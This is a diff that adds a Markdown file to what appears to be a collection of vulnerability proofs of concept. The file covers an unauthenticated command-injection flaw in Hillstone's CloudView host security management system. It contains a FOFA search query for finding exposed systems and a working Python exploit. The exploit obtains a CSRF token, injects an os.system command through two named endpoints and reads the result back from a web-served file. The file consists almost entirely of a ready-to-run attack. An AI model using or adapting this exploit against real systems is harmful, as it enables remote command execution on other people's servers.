diff --git a/山石网科云鉴存在前台任意命令执行漏洞.md b/山石网科云鉴存在前台任意命令执行漏洞.md new file mode 100644 index 0000000..98d69d3 --- /dev/null +++ b/山石网科云鉴存在前台任意命令执行漏洞.md @@ -0,0 +1,47 @@ +## 山石网科云鉴存在前台任意命令执行漏洞 + +## fofa +``` +"山石云鉴主机安全管理系统" +``` + +## poc +``` +import requests +''' +HSVD-2023-0008 +''' +def setSystemTimeAction(newcsrf,headers): + url = "https://192.168.199.221/master/ajaxActions/setSystemTimeAction.php?token_csrf="+newcsrf + proxies = {'https':'http://127.0.0.1:8080'} + x = "param=os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')" + #req2 = requests.post(url2, data=x, proxies=proxies, verify=False, headers=headers) + req2 = requests.post(url, data=x,headers=headers, verify=False) + +''' +HSVD-2023-0005 +''' +def getMessageSettingAction(newcsrf,header): + proxies = {'https':'http://127.0.0.1:8080'} + company_uuid = "aaa" + platform_sel = "os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')" + url = 'https://192.168.199.221/master/ajaxActions/getMessageSettingAction.php?token_csrf='+newcsrf+"&company_uuid="+company_uuid+"&platform_sel="+platform_sel + req = requests.get(url, headers=header, verify=False) + print(req.text) + + +def main(): + headers = {"Cookie": "PHPSESSID=emhpeXVhbg;", + "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8" + } + url = "https://192.168.199.221/master/ajaxActions/getTokenAction.php" + req = requests.post(url, verify=False, headers=headers) + newcsrf = req.text.replace("\n", "") + setSystemTimeAction(newcsrf,headers) + reshell = requests.get('https://192.168.199.221/master/img/config',verify=False) + print('---------------------cmd-------------------------') + print(reshell.text) + +if __name__ == '__main__': + main() +```